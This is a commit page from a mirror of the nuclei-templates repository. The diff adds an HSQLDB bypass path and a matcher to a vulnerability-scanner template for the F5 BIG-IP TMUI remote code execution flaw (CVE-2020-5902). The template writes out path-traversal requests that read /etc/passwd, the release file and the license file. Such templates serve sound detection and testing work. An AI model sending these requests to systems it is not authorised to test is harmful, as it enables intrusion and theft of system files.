daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

CVE-2020-5902 added hsqldb bypass

patch-1
ringo 2020-08-22 19:37:43 -05:00
parent 7b1c5403e4
commit 986a49f6d1
1 changed files with 4 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
cves/CVE-2020-5902.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
author: madrobot & dwisiswant0
author: madrobot & dwisiswant0 & ringo
severity: high
requests:
@ -11,6 +11,7 @@ requests:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
- "{{BaseURL}}/hsqldb%0a"
matchers-condition: and
matchers:
- type: status
@ -21,6 +22,7 @@ requests:
- "root:[x*]:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
- "HSQL Database Engine Servlet"
condition: or
part: body
- raw:
@ -59,4 +61,4 @@ requests:
- 200
- type: word
words:
- "h3ll0_w0Rld"
- "h3ll0_w0Rld"